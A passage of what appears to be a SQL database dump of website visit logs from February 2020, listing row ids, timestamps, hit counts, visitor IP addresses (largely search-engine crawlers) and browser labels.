.249.64.26','chrome'),(482372,1581962686,1,1,0,0,'8.29.198.26','other'),(482373,1581962907,1,1,0,0,'66.249.70.36','chrome'),(482374,1581962965,2,2,0,0,'157.55.39.102','other'),(482375,1581963061,1,1,0,0,'66.249.64.27','chrome'),(482376,1581963210,2,2,0,0,'66.249.64.26','chrome'),(482377,1581963389,1,1,0,0,'116.193.170.50','chrome'),(482378,1581963924,3,3,0,0,'66.249.70.36','chrome'),(482379,1581963976,2,2,0,0,'66.249.64.28','chrome'),(482380,1581964050,1,1,0,0,'66.249.64.27','chrome'),(482381,1581964136,1,1,0,0,'157.55.39.102','other'),(482382,1581964252,2,2,0,0,'66.249.64.26','chrome'),(482383,1581964930,1,1,0,0,'91.196.178.66','chrome'),(482384,1581965026,1,1,0,0,'66.249.70.36','chrome'),(482385,1581965033,1,1,0,0,'66.249.64.27','chrome'),(482386,1581965603,1,0,1,0,'207.46.13.149',''),(482387,1581966099,1,1,0,0,'66.249.64.28','chrome'),(482388,1581966110,1,1,0,0,'207.46.13.118','other'),(482389,1581966241,2,2,0,0,'46.211.246.129','chrome'),(482390,1581966304,1,1,0,0,'66.249.93.27','chrome'),(482391,1581966347,1,1,0,0,'91.196.178.17','chrome'),(482392,1581966447,1,1,0,0,'207.46.13.149','other'),(482393,1581966845,1,0,1,0,'66.249.64.26',''),(482394,1581966902,1,1,0,0,'141.8.188.39','other'),(482395,1581967143,2,1,1,0,'66.249.64.28',''),(482396,1581967154,2,2,0,0,'157.55.39.102','other'),(482397,1581967192,1,1,0,0,'141.8.188.20','other'),(482398,1581967251,1,1,0,0,'178.93.148.240','chrome'),(482399,1581967374,1,1,0,0,'66.249.70.62','chrome'),(482400,1581967707,1,1,0,0,'141.8.142.119','other'),(482401,1581967831,1,1,0,0,'207.46.13.118','other'),(482402,1581968267,2,2,0,0,'66.249.64.26','chrome'),(482403,1581968289,1,1,0,0,'207.46.13.149','other'),(482404,1581968745,4,4,0,0,'66.249.64.27','chrome'),(482405,1581969032,1,1,0,0,'141.8.142.2','other'),(482406,1581969370,5,5,0,0,'66.249.64.26','chrome'),(482407,1581969381,1,1,0,0,'66.249.70.36','chrome'),(482408,1581969551,1,1,0,0,'176.105.198.52','chrome'),(482409,1581969627,1,1,0,0,'8.29.198.27','other'),(482410,1581969860,1,1,0,0,'89.113.127.62','firefox'),(482411,1581970071,1,1,0,0,'173.252.95.47','other'),(482412,1581970905,2,2,0,0,'66.249.64.26','chrome'),(482413,1581970921,4,4,0,0,'66.249.64.28','chrome'),(482414,1581970923,2,2,0,0,'66.249.70.36','chrome'),(482415,1581971241,2,2,0,0,'95.213.141.126','opera'),(482416,1581971659,3,3,0,0,'66.249.64.27','chrome'),(482417,1581971975,4,4,0,0,'66.249.64.28','chrome'),(482418,1581972393,5,5,0,0,'66.249.64.26','chrome'),(482419,1581972591,1,1,0,0,'66.249.70.33','chrome'),(482420,1581972600,2,2,0,0,'66.249.64.27','chrome'),(482421,1581972874,1,1,0,0,'157.55.39.102','other'),(482422,1581973593,1,1,0,0,'46.211.138.50','other'),(482423,1581973624,1,1,0,0,'8.29.198.27','other'),(482424,1581975499,1,1,0,0,'37.9.113.39','other'),(482425,1581975589,1,1,0,0,'207.46.13.149','other'),(482426,1581975783,1,1,0,0,'141.8.132.31','other'),(482427,1581975873,1,1,0,0,'5.45.207.49','other'),(482428,1581976726,1,1,0,0,'141.8.188.38','other'),(482429,1581976986,1,1,0,0,'141.8.142.128','other'),(482430,1581977434,2,2,0,0,'66.249.64.27','chrome'),(482431,1581977547,1,1,0,0,'66.249.70.36','chrome'),(482432,1581977623,9,9,0,0,'66.249.64.26','chrome'),(482433,1581977637,2,2,0,0,'66.249.70.33','chrome'),(482434,1581977722,1,1,0,0,'66.249.70.62','chrome'),(482435,1581977725,2,2,0,0,'66.249.64.28','chrome'),(482436,1581978431,5,5,0,0,'66.249.64.27','chrome'),(482437,1581978731,2,2,0,0,'66.249.64.28','chrome'),(482438,1581978745,5,5,0,0,'66.249.64.26','chrome'),(482439,1581979398,1,1,0,0,'176.15.195.14','chrome'),(482440,1581980028,2,2,0,0,'141.8.188.38','other'),(482441,1581980039,1,1,0,0,'66.249.64.28','chrome'),(482442,1581980542,1,1,0,0,'8.29.198.27','other'),(482443,1581980841,1,1,0,0,'141.8.183.18','other'),(482444,1581981304,1,1,0,0,'66.249.64.28','chrome'),(482445,1581981624,1,1,0,0,'95.108.213.61','other'),(482446,1581982806,1,1,0,0,'95.108.181.103','other'),(482447,1581983745,3,3,0,0,'66.249.64.27','chrome'),(482448,1581983913,2,2,0,0,'66.249.70.36','chrome'),(482449,1581984144,1,1,0,0,'37.9.113.10','other'),(482450,1581984261,1,1,0,0,'66.249.64.28','chrome'),(482451,1581984349,1,1,0,0,'141.8.132.19','other'),(482452,1581984453,4,4,0,0,'66.249.64.26','chrome'),(482453,1581984539,1,1,0,0,'8.29.198.26','other'),(482454,1581985113,1,1,0,0,'141.8.188.38','other'),(482455,1581986227,1,1,0,0,'141.8.188.38','other'),(482456,1581986451,4,4,0,0,'66.249.64.26','chrome'),(482457,1581986979,1,1,0,0,'66.249.64.27','chrome'),(482458,1581987010,1,1,0,0,'66.249.70.62','chrome'),(482459,1581987209,60,60,0,0,'185.230.242.3','other'),(482460,1581987251,3,3,0,0,'66.249.64.28','chrome'),(482461,1581987313,1,1,0,0,'62.205.134.182','other'),(482462,1581987404,5,5,0,0,'66.249.64.26','chrome'),(482463,1581987743,1,1,0,0,'66.249.70.33','chrome'),(482464,1581988049,3,3,0,0,'66.249.64.27','chrome'),(482465,1581988118,82,82,0,0,'185.230.242.3','other'),(482466,1581988165,1,1,0,0,'141.8.142.132','other'),(482467,1581988304,1,1,0,0,'66.249.64.28','chrome'),(482468,1581988325,1,1,0,0,'37.9.113.39','other'),(482469,1581988619,1,1,0,0,'95.108.213.61','other'),(482470,1581988897,2,2,0,0,'66.249.64.26','chrome'),(482471,1581989177,67,67,0,0,'185.230.242.3','other'),(482472,1581989211,1,1,0,0,'66.249.70.62','chrome'),(482473,1581989483,1,1,0,0,'66.249.70.33','chrome'),(482474,1581989554,1,1,0,0,'66.249.64.27','chrome'),(482475,1581990155,1,1,0,0,'141.8.188.38','other'),(482476,1581990315,1,1,0,0,'141.8.188.39','other'),(482477,1581990369,2,2,0,0,'207.46.13.118','other'),(482478,1581990422,2,2,0,0,'66.249.64.26','chrome'),(482479,1581990529,1,1,0,0,'157.55.39.102','other'),(482480,1581991460,1,1,0,0,'66.249.64.26','chrome'),(482481,1581991461,1,1,0,0,'8.29.198.27','other'),(482482,1581991770,1,1,0,0,'66.249.64.28','chrome'),(482483,1581991899,1,1,0,0,'66.249.70.36','chrome'),(482484,1581992857,1,1,0,0,'66.249.64.27','chrome'),(482485,1581993492,2,2,0,0,'66.249.70.36','chrome'),(482486,1581993642,1,1,0,0,'37.9.113.142','other'),(482487,1581994527,1,1,0,0,'66.249.64.26','chrome'),(482488,1581994666,1,1,0,0,'66.249.70.36','chrome'),(482489,1581994742,1,1,0,0,'141.8.188.18','other'),(482490,1581994847,1,1,0,0,'66.249.70.33','chrome'),(482491,1581994952,3,3,0,0,'66.249.64.28','chrome'),(482492,1581995064,2,2,0,0,'66.249.64.27','chrome'),(482493,1581995256,1,1,0,0,'207.46.13.149','other'),(482494,1581995276,1,1,0,0,'207.46.13.118','other'),(482495,1581995386,1,1,0,0,'95.30.125.130','firefox'),(482496,1581995389,1,1,0,0,'95.30.125.130','other'),(482497,1581995458,1,0,1,0,'66.249.64.26',''),(482498,1581995461,1,1,0,0,'8.29.198.27','other'),(482499,1581996457,1,1,0,0,'31.13.115.25','other'),(482500,1581996458,1,1,0,0,'31.13.115.4','other'),(482501,1581996738,1,1,0,0,'66.249.64.28','chrome'),(482502,1581996752,1,1,0,0,'37.9.113.142','other'),(482503,1581996911,1,1,0,0,'207.46.13.118','other'),(482504,1581997175,1,1,0,0,'141.8.188.18','other'),(482505,1581997854,1,1,0,0,'165.22.97.94','firefox'),(482506,1581998036,1,1,0,0,'141.8.183.67','other'),(482507,1581998197,1,1,0,0,'141.8.142.164','other'),(482508,1581998657,1,1,0,0,'37.9.113.142','other'),(482509,1581999975,1,1,0,0,'66.249.64.26','chrome'),(482510,1582000168,1,1,0,0,'37.9.113.97','other'),(482511,1582000520,13,13,0,0,'185.230.242.3','other'),(482512,1582000602,1,1,0,0,'37.9.113.33','other'),(482513,1582000977,1,1,0,0,'157.55.39.102','other'),(482514,1582001364,1,1,0,0,'66.249.64.26','chrome'),(482515,1582002085,1,1,0,0,'91.196.178.153','firefox'),(482516,1582002107,1,1,0,0,'188.163.104.74','chrome'),(482517,1582002357,1,1,0,0,'8.29.198.27','other'),(482518,1582002866,1,1,0,0,'37.9.113.39','other'),(482519,1582002877,13,13,0,0,'185.230.242.3','other'),(482520,1582002950,1,1,0,0,'141.8.188.20','other'),(482521,1582002975,2,2,0,0,'66.249.64.28','chrome'),(482522,1582003395,1,1,0,0,'207.46.13.149','other'),(482523,1582003398,1,1,0,0,'91.196.178.10','chrome'),(482524,1582003847,1,1,0,0,'178.94.172.232','chrome'),(482525,1582004486,1,1,0,0,'62.205.134.182','other'),(482526,1582005104,18,18,0,0,'185.230.242.3','other'),(482527,1582005421,2,2,0,0,'66.249.64.26','chrome'),(482528,1582006380,1,1,0,0,'8.29.198.25','other'),(482529,1582006644,20,20,0,0,'185.230.242.3','other'),(482530,1582006973,3,3,0,0,'66.249.64.26','chrome'),(482531,1582007046,1,1,0,0,'66.249.64.27','chrome'),(482532,1582007075,1,1,0,0,'66.249.70.62','chrome'),(482533,1582007199,1,1,0,0,'66.249.64.28','chrome'),(482534,1582007339,1,1,0,0,'178.92.251.89','chrome'),(482535,1582007980,1,1,0,0,'141.8.142.2','other'),(482536,1582008242,1,1,0,0,'92.112.124.239','firefox'),(482537,1582008258,1,1,0,0,'66.249.64.27','chrome'),(482538,1582008789,1,1,0,0,'91.196.178.66','chrome'),(482539,1582008889,1,1,0,0,'207.46.13.149','other'),(482540,1582009042,1,1,0,0,'141.8.142.161','other'),(482541,1582009046,1,1,0,0,'91.196.178.76','chrome'),(482542,1582009079,1,1,0,0,'91.196.178.42','chrome'),(482543,1582009096,2,2,0,0,'66.249.64.28','chrome'),(482544,1582009441,1,1,0,0,'141.8.142.132','other'),(482545,1582009480,1,1,0,0,'31.13.127.21','other'),(482546,1582009481,1,1,0,0,'31.13.127.12','other'),(482547,1582009482,1,1,0,0,'31.13.115.7','other'),(482548,1582009622,1,1,0,0,'66.249.70.36','chrome'),(482549,1582009673,3,3,0,0,'66.249.64.26','chrome'),(482550,1582009752,1,1,0,0,'66.249.64.27','chrome'),(482551,1582009851,1,1,0,0,'37.9.113.39','other'),(482552,1582010176,31,31,0,0,'185.230.242.3','other'),(482553,1582010414,1,1,0,0,'91.196.178.119','chrome'),(482554,1582010639,1,1,0,0,'141.8.142.132','other'),(482555,1582010748,1,1,0,0,'31.13.127.12','other'),(482556,1582010750,1,1,0,0,'31.13.127.22','other'),(482557,1582010845,1,0,1,0,'66.249.64.28',''),(482558,1582011174,37,37,0,0,'185.230.242.3','other'),(482559,1582011220,1,1,0,0,'66.249.64.28','chrome'),(482560,1582011379,1,1,0,0,'91.196.178.119','chrome'),(482561,1582011436,1,1,0,0,'91.196.178.76','chrome'),(482562,1582011451,1,1,0,0,'66.249.70.62','chrome'),(482563,1582011899,1,1,0,0,'66.249.64.26','chrome'),(482564,1582011914,1,0,1,0,'66.249.70.36',''),(482565,1582012141,17,17,0,0,'185.230.242.3','other'),(482566,1582012213,1,1,0,0,'178.154.171.33','other'),(482567,1582012350,1,1,0,0,'141.8.183.67','other'),(482568,1582012778,2,2,0,0,'195.10.210.70','chrome'),(482569,1582012800,1,1,0,0,'95.108.181.103','other'),(482570,1582012832,1,1,0,0,'66.249.64.26','chrome'),(482571,1582013095,1,1,0,0,'66.249.64.27','chrome'),(482572,1582013180,1,1,0,0,'5.45.207.49','other'),(482573,1582013239,2,2,0,0,'130.180.209.8','chrome'),(482574,1582013253,1,1,0,0,'8.29.198.27','other'),(482575,1582013404,1,1,0,0,'37.53.228.153','chrome'),(482576,1582013494,1,1,0,0,'91.196.178.74','chrome'),(482577,1582013722,1,1,0,0,'66.249.64.28','chrome'),(482578,1582013940,1,0,1,0,'66.249.70.36',''),(482579,1582014096,1,1,0,0,'157.55.39.102','other'),(482580,1582014105,1,1,0,0,'207.46.13.118','other'),(482581,1582014110,1,1,0,0,'207.46.13.149','other'),(482582,1582014401,1,1,0,0,'94.153.101.237','other'),(482583,1582014701,1,1,0,0,'66.249.64.28','chrome'),(482584,1582014848,59,59,0,0,'185.230.242.3','other'),(482585,1582014922,1,1,0,0,'66.249.64.26','chrome'),(482586,1582015155,1,1,0,0,'66.249.70.33','chrome'),(482587,1582015743,1,1,0,0,'95.108.213.55','other'),(482588,1582015943,1,1,0,0,'46.201.227.249','chrome'),(482589,1582017309,1,1,0,0,'8.29.198.25','other'),(482590,1582018364,1,1,0,0,'66.249.70.33','chrome'),(482591,1582019297,1,1,0,0,'91.196.178.181','chrome'),(482592,1582019332,1,1,0,0,'66.249.64.26','chrome'),(482593,1582019513,1,1,0,0,'3.233.229.220','chrome'),(482594,1582019671,1,1,0,0,'91.196.177.46','chrome'),(482595,1582020468,1,1,0,0,'66.220.149.21','other'),(482596,1582020531,1,1,0,0,'37.9.113.97','other'),(482597,1582021219,1,1,0,0,'91.196.177.46','chrome'),(482598,1582021823,1,1,0,0,'178.154.171.66','other'),(482599,1582022504,1,1,0,0,'141.8.188.38','other'),(482600,1582022946,1,1,0,0,'91.196.177.228','chrome'),(482601,1582023555,1,0,1,0,'157.55.39.102',''),(482602,1582023802,1,1,0,0,'46.211.144.34','chrome'),(482603,1582024099,2,2,0,0,'66.249.64.28','chrome'),(482604,1582024176,1,1,0,0,'91.196.177.46','chrome'),(482605,1582024287,1,1,0,0,'8.29.198.27','other'),(482606,1582024459,1,1,0,0,'95.108.213.55','other'),(482607,1582024560,1,1,0,0,'66.249.64.27','chrome'),(482608,1582025232,1,1,0,0,'66.249.64.28','chrome'),(482609,1582025730,1,1,0,0,'66.249.70.62','chrome'),(482610,1582026178,2,2,0,0,'66.249.64.26','chrome'),(482611,1582026849,1,1,0,0,'66.249.70.62','chrome'),(482612,1582027180,2,2,0,0,'66.249.64.28','chrome'),(482613,1582027718,2,2,0,0,'66.249.64.27','chrome'),(482614,1582027739,1,1,0,0,'109.74.154.72','chrome'),(482615,1582028137,1,1,0,0,'66.249.64.28','chrome'),(482616,1582028235,1,1,0,0,'8.29.198.27','other'),(482617,1582028437,3,3,0,0,'207.46.13.118','other'),(482618,1582029202,1,1,0,0,'77.111.244.211','chrome'),(482619,1582029252,1,1,0,0,'31.13.127.8','other'),(482620,1582029610,1,1,0,0,'107.178.40.24','chrome'),(482621,1582029819,1,1,0,0,'66.249.64.26','chrome'),(482622,1582030078,1,1,0,0,'207.46.13.149','other'),(482623,1582030431,1,1,0,0,'207.46.13.118','other'),(482624,1582030515,1,1,0,0,'141.8.183.67','other'),(482625,1582031360,1,1,0,0,'157.55.39.102','other'),(482626,1582032338,2,2,0,0,'66.249.64.26','chrome'),(482627,1582032844,1,1,0,0,'31.13.127.2','other'),(482628,1582033069,1,1,0,0,'157.55.39.102','other'),(482629,1582033726,1,1,0,0,'213.180.203.124','other'),(482630,1582034576,1,1,0,0,'178.154.171.134','other'),(482631,1582034769,1,1,0,0,'91.196.178.71','chrome'),(482632,1582034904,1,1,0,0,'95.133.250.17','chrome'),(482633,1582034982,1,1,0,0,'66.249.64.26','chrome'),(482634,1582035006,1,1,0,0,'91.196.178.76','chrome'),(482635,1582035050,1,1,0,0,'66.249.64.28','chrome'),(482636,1582035390,1,1,0,0,'8.29.198.25','other'),(482637,1582035448,1,1,0,0,'207.46.13.149','other'),(482638,1582035799,1,1,0,0,'144.217.73.132','other'),(482639,1582035836,1,1,0,0,'144.217.73.132','chrome'),(482640,1582036097,1,1,0,0,'66.249.64.26','chrome'),(482641,1582036395,1,1,0,0,'66.249.64.28','chrome'),(482642,1582036488,1,1,0,0,'213.180.203.185','other'),(482643,1582036856,2,2,0,0,'66.249.64.27','chrome'),(482644,1582036878,1,1,0,0,'46.201.240.144','chrome'),(482645,1582037015,2,2,0,0,'66.249.64.26','chrome'),(482646,1582037043,1,1,0,0,'141.8.142.132','other'),(482647,1582037103,1,1,0,0,'95.108.181.103','other'),(482648,1582037570,1,1,0,0,'157.55.39.102','other'),(482649,1582037795,2,2,0,0,'207.46.13.118','other'),(482650,1582038051,1,1,0,0,'46.201.240.144','chrome'),(482651,1582038346,1,1,0,0,'141.8.188.20','other'),(482652,1582038349,1,1,0,0,'141.8.188.39','other'),(482653,1582038798,2,2,0,0,'66.249.64.27','chrome'),(482654,1582039167,1,1,0,0,'8.29.198.27','other'),(482655,1582039445,1,1,0,0,'157.55.39.102','other'),(482656,1582039970,1,1,0,0,'66.249.70.36','chrome'),(482657,1582040027,3,3,0,0,'66.249.64.26','chrome'),(482658,1582040151,3,3,0,0,'66.249.64.28','chrome'),(482659,1582040383,1,1,0,0,'66.249.70.33','chrome'),(482660,1582040398,2,2,0,0,'213.180.203.124','other'),(482661,1582041372,1,1,0,0,'95.108.213.3','other'),(482662,1582041475,1,1,0,0,'62.4.16.86','other'),(482663,1582041509,1,1,0,0,'157.55.39.102','other'),(482664,1582041748,4,4,0,0,'66.249.64.26','chrome'),(482665,1582042020,1,1,0,0,'66.249.70.62','chrome'),(482666,1582042212,1,1,0,0,'66.249.64.28','chrome'),(482667,1582042694,1,1,0,0,'66.249.64.26','chrome'),(482668,1582042816,1,1,0,0,'91.196.178.72','firefox'),(482669,1582042913,1,1,0,0,'94.178.147.163','chrome'),(482670,1582043352,1,1,0,0,'141.8.142.177','other'),(482671,1582043483,1,1,0,0,'157.55.39.102','other'),(482672,1582043736,1,1,0,0,'213.180.203.124','other'),(482673,1582043841,1,1,0,0,'207.46.13.149','other'),(482674,1582043862,4,4,0,0,'60.191.38.77','firefox'),(482675,1582044012,1,1,0,0,'66.249.64.26','chrome'),(482676,1582044592,1,1,0,0,'31.13.127.12','other'),(482677,1582044594,1,1,0,0,'31.13.127.9','other'),(482678,1582044748,1,1,0,0,'91.196.178.186','chrome'),(482679,1582044778,1,1,0,0,'66.249.70.36','chrome'),(482680,1582045247,2,2,0,0,'66.249.64.28','chrome'),(482681,1582045423,2,2,0,0,'66.249.64.26','chrome'),(482682,1582045785,1,1,0,0,'66.249.70.62','chrome'),(482683,1582046214,1,1,0,0,'213.180.203.185','other'),(482684,1582046409,1,1,0,0,'8.29.198.26','other'),(482685,1582046634,2,2,0,0,'66.249.64.27','chrome'),(482686,1582047150,2,2,0,0,'207.46.13.149','other'),(482687,1582047223,1,1,0,0,'213.180.203.185','other'),(482688,1582047546,2,2,0,0,'66.249.64.28','chrome'),(482689,1582047636,2,2,0,0,'66.249.64.27','chrome'),(482690,1582047682,1,1,0,0,'66.249.70.62','chrome'),(482691,1582047727,1,1,0,0,'66.249.64.26','chrome'),(482692,1582047740,3,3,0,0,'213.180.203.124','other'),(482693,1582047919,1,1,0,0,'141.8.188.18','other'),(482694,1582048311,1,1,0,0,'207.46.13.149','other'),(482695,1582048540,2,2,0,0,'157.55.39.102','other'),(482696,1582048587,1,1,0,0,'46.211.147.142','chrome'),(482697,1582048826,1,1,0,0,'141.8.183.18','other'),(482698,1582048830,1,1,0,0,'141.8.132.28','other'),(482699,1582049179,1,1,0,0,'91.196.178.66','chrome'),(482700,1582049536,3,3,0,0,'66.249.64.26','chrome'),(482701,1582049698,2,2,0,0,'66.249.64.28','chrome'),(482702,1582050361,1,1,0,0,'8.29.198.27','other'),(482703,1582050771,1,1,0,0,'66.249.64.27','chrome'),(482704,1582050838,1,1,0,0,'46.211.156.151','chrome'),(482705,1582050959,2,2,0,0,'5.180.62.37','chrome'),(482706,1582051144,1,1,0,0,'185.158.112.82','chrome'),(482707,1582051366,1,1,0,0,'91.209.11.236','other'),(482708,1582051515,1,1,0,0,'207.46.13.149','other'),(482709,1582051982,1,1,0,0,'66.249.64.28','chrome'),(482710,1582052024,1,1,0,0,'157.55.39.102','other'),(482711,1582052540,1,1,0,0,'209.17.97.18','other'),(482712,1582052707,1,0,1,0,'66.249.64.27',''),(482713,1582053547,2,2,0,0,'157.55.39.102','other'),(482714,1582053729,1,1,0,0,'66.249.64.26','chrome'),(482715,1582053856,2,2,0,0,'66.249.64.27','chrome'),(482716,1582054114,1,1,0,0,'178.154.171.7','other'),(482717,1582054174,1,1,0,0,'66.249.64.28','chrome'),(482718,1582054411,1,1,0,0,'66.249.70.36','chrome'),(482719,1582055576,1,1,0,0,'173.252.111.1','other'),(482720,1582055577,1,1,0,0,'173.252.111.22','other'),(482724,1582055802,2,1,1,0,'207.46.13.149',''),(482725,1582055893,1,1,0,0,'91.196.178.167','chrome'),(482726,1582056011,1,1,0,0,'66.249.64.26','chrome'),(482727,1582056086,1,1,0,0,'66.249.64.28','chrome'),(482728,1582056587,1,1,0,0,'195.10.210.70','chrome'),(482729,1582056822,2,2,0,0,'213.180.203.124','other'),(482730,1582057413,1,1,0,0,'207.46.13.149','other'),(482731,1582057455,1,1,0,0,'8.29.198.26','other'),(482732,1582057526,1,1,0,0,'46.211.143.186','other'),(482733,1582058445,1,1,0,0,'199.187.125.84','firefox'),(482734,1582058559,1,1,0,0,'66.249.64.26','chrome'),(482735,1582058572,3,3,0,0,'207.46.13.149','other'),(482736,1582059079,1,1,0,0,'91.225.146.126','chrome'),(482737,1582059735,1,1,0,0,'66.249.64.28','chrome'),(482738,1582060130,1,1,0,0,'178.154.171.7','other'),(482739,1582060135,1,1,0,0,'66.249.64.27','chrome'),(482740,1582060392,1,1,0,0,'66.102.9.164','chrome'),(482741,1582060433,1,1,0,0,'46.133.77.101','chrome'),(482742,1582060699,1,1,0,0,'141.8.142.2','other'),(482743,1582061339,1,1,0,0,'8.29.198.25','other'),(482744,1582061897,1,1,0,0,'95.108.213.55','other'),(482745,1582062061,1,1,0,0,'141.8.132.2','other'),(482746,1582063557,1,1,0,0,'141.8.183.111','other'),(482747,1582063921,1,1,0,0,'37.9.113.10','other'),(482748,1582064904,1,1,0,0,'141.8.142.115','other'),(482749,1582064965,1,1,0,0,'207.46.13.149','other'),(482750,1582064982,1,1,0,0,'141.8.142.164','other'),(482751,1582065640,2,2,0,0,'178.154.171.134','other'),(482752,1582065868,1,1,0,0,'141.8.183.111','other'),(482753,1582066971,1,1,0,0,'66.249.64.27','chrome'),(482754,1582067097,1,0,1,0,'66.249.64.28',''),(482755,1582067378,1,1,0,0,'34.76.19.107','other'),(482756,1582068089,1,1,0,0,'66.249.64.27','chrome'),(482757,1582068192,2,2,0,0,'178.154.171.134','other'),(482758,1582068446,1,1,0,0,'8.29.198.27','other'),(482759,1582069583,1,1,0,0,'178.154.171.134','other'),(482760,1582070677,1,1,0,0,'66.249.64.27','chrome'),(482761,1582070757,1,1,0,0,'178.154.171.134','other'),(482762,1582072325,1,1,0,0,'8.29.198.25','other'),(482763,1582073148,1,1,0,0,'66.249.64.28','chrome'),(482764,1582073267,1,1,0,0,'66.249.64.27','chrome'),(482765,1582073673,2,2,0,0,'178.154.171.134','other'),(482766,1582073713,1,1,0,0,'62.205.134.182','other'),(482767,1582074021,1,1,0,0,'141.8.142.2','other'),(482768,1582074244,1,1,0,0,'66.249.64.27','chrome'),(482769,1582074415,3,3,0,0,'66.249.64.26','chrome'),(482770,1582075087,2,2,0,0,'178.154.171.134','other'),(482771,1582075172,1,1,0,0,'178.154.171.127','other'),(482772,1582075956,2,2,0,0,'66.249.64.27','chrome'),(482773,1582076091,1,1,0,0,'178.154.171.127','other'),(482774,1582076202,3,3,0,0,'66.249.64.28','chrome'),(482775,1582076489,1,1,0,0,'66.249.64.26','chrome'),(482776,1582077674,2,2,0,0,'66.249.64.27','chrome'),(482777,1582078089,2,2,0,0,'66.249.64.28','chrome'),(482778,1582078232,1,1,0,0,'66.249.64.26','chrome'),(482779,1582078712,1,1,0,0,'141.8.183.33','other'),(482780,1582079400,3,3,0,0,'66.249.64.26','chrome'),(482781,1582079454,1,1,0,0,'8.29.198.25','other'),(482782,1582079563,4,4,0,0,'66.249.64.27','chrome'),(482783,1582079859,1,1,0,0,'66.249.64.28','chrome'),(482784,1582080687,1,1,0,0,'95.108.181.104','other'),(482785,1582080852,2,1,1,0,'66.249.64.28',''),(482786,1582081402,1,1,0,0,'178.154.171.127','other'),(482787,1582081759,1,1,0,0,'178.154.171.134','other'),(482788,1582081915,1,1,0,0,'209.17.96.58','other'),(482789,1582081957,1,1,0,0,'95.108.213.3','other'),(482790,1582082141,2,2,0,0,'66.249.64.26','chrome'),(482791,1582082822,1,1,0,0,'178.154.171.134','other'),(482792,1582083124,1,1,0,0,'141.8.142.115','other'),(482793,1582083233,1,1,0,0,'141.8.183.67','other'),(482794,1582083285,1,1,0,0,'8.29.198.26','other'),(482795,1582083764,1,1,0,0,'207.46.13.149','other'),(482796,1582083986,1,1,0,0,'62.4.16.86','other'),(482797,1582086420,1,1,0,0,'141.8.142.115','other'),(482798,1582086499,1,1,0,0,'141.8.183.18','other'),(482799,1582086511,1,1,0,0,'66.249.70.36','chrome'),(482800,1582086526,4,4,0,0,'66.249.64.26','chrome'),(482801,1582086935,1,1,0,0,'66.249.64.27','chrome'),(482802,1582087052,2,2,0,0,'66.249.64.28','chrome'),(482803,1582088265,1,1,0,0,'207.46.13.91','other'),(482804,1582088296,1,1,0,0,'66.249.64.28','chrome'),(482805,1582088360,1,1,0,0,'37.9.113.163','other'),(482806,1582088837,2,2,0,0,'66.249.64.27','chrome'),(482807,1582089478,1,1,0,0,'31.13.115.3','other'),(482808,1582089479,1,1,0,0,'31.13.115.27','other'),(482809,1582089668,1,1,0,0,'141.8.142.164','other'),(482810,1582089676,1,1,0,0,'141.8.142.115','other'),(482811,1582089907,1,1,0,0,'31.13.115.2','other'),(482812,1582089909,2,2,0,0,'31.13.115.21','other'),(482815,1582090428,1,1,0,0,'8.29.198.25','other'),(482816,1582090465,1,1,0,0,'37.9.113.10','other'),(482817,1582090642,1,1,0,0,'141.8.142.164','other'),(482818,1582090793,1,1,0,0,'66.249.70.62','chrome'),(482819,1582090843,1,1,0,0,'62.205.134.182','other'),(482820,1582091089,2,2,0,0,'66.249.64.28','chrome'),(482821,1582091696,1,1,0,0,'66.249.64.26','chrome'),(482822,1582092068,1,1,0,0,'95.108.213.3','other'),(482823,1582092487,1,1,0,0,'207.46.13.91','other'),(482824,1582093185,2,1,1,0,'66.249.64.26',''),(482825,1582093189,2,2,0,0,'141.8.142.132','other'),(482826,1582093505,1,1,0,0,'141.8.142.119','other'),(482827,1582093528,1,1,0,0,'95.108.213.3','other'),(482828,1582094059,2,2,0,0,'66.249.64.26','chrome'),(482829,1582094066,2,2,0,0,'91.196.178.165','chrome'),(482830,1582094068,2,2,0,0,'66.249.64.27','chrome'),(482831,1582094208,1,1,0,0,'66.249.70.33','chrome'),(482832,1582094214,1,1,0,0,'8.29.198.27','other'),(482833,1582094243,1,1,0,0,'141.8.142.132','other'),(482834,1582094371,1,1,0,0,'37.9.113.142','other'),(482835,1582094504,2,2,0,0,'66.249.64.28','chrome'),(482836,1582094985,1,1,0,0,'66.249.64.27','chrome'),(482837,1582095865,2,2,0,0,'91.196.178.165','chrome'),(482838,1582095884,1,1,0,0,'91.196.178.76','chrome'),(482839,1582096185,1,1,0,0,'66.249.70.62','chrome'),(482840,1582096585,1,1,0,0,'66.249.64.27','chrome'),(482841,1582096942,1,1,0,0,'176.193.10.84','chrome'),(482842,1582097806,1,1,0,0,'178.154.171.127','other'),(482843,1582098218,1,1,0,0,'193.17.44.18','chrome'),(482844,1582098849,1,1,0,0,'178.154.171.134','other'),(482845,1582098998,1,1,0,0,'141.8.132.12','other'),(482846,1582099112,1,1,0,0,'141.8.142.50','other'),(482847,1582099639,1,1,0,0,'91.196.178.76','chrome'),(482848,1582100387,1,1,0,0,'178.154.171.134','other'),(482849,1582100458,2,2,0,0,'207.46.13.149','other'),(482850,1582100857,1,1,0,0,'141.8.183.73','other'),(482851,1582100926,1,1,0,0,'66.249.64.28','chrome'),(482852,1582101431,1,1,0,0,'8.29.198.25','other'),(482853,1582101784,1,1,0,0,'178.154.171.134','other'),(482854,1582102524,1,1,0,0,'46.174.125.28','chrome'),(482855,1582102765,1,1,0,0,'46.219.6.40','firefox'),(482856,1582103642,1,1,0,0,'17.58.101.25','other'),(482857,1582103853,1,1,0,0,'91.196.178.93','chrome'),(482858,1582104259,1,1,0,0,'91.196.178.169','chrome'),(482859,1582104312,1,0,1,0,'66.249.64.28',''),(482860,1582104526,3,3,0,0,'66.249.64.28','chrome'),(482861,1582104644,1,1,0,0,'66.249.64.26','chrome'),(482862,1582105100,13,13,0,0,'3.94.202.172','other'),(482863,1582105194,1,1,0,0,'8.29.198.26','other'),(482864,1582105341,1,0,1,0,'66.249.64.27',''),(482865,1582105356,1,1,0,0,'178.154.171.134','other'),(482866,1582105400,1,1,0,0,'66.249.70.33','chrome'),(482867,1582105518,1,1,0,0,'66.249.64.27','chrome'),(482868,1582106025,4,4,0,0,'3.94.202.172','other'),(482869,1582106467,1,1,0,0,'66.249.64.27','chrome'),(482870,1582106968,1,1,0,0,'66.249.64.26','chrome'),(482871,1582107065,2,2,0,0,'3.94.202.172','other'),(482872,1582107111,3,3,0,0,'178.154.171.134','other'),(482873,1582107304,1,1,0,0,'66.249.70.33','chrome'),(482874,1582107798,1,1,0,0,'18.191.250.22','chrome'),(482875,1582108045,4,4,0,0,'3.94.202.172','other'),(482876,1582108163,1,1,0,0,'66.249.64.27','chrome'),(482877,1582108289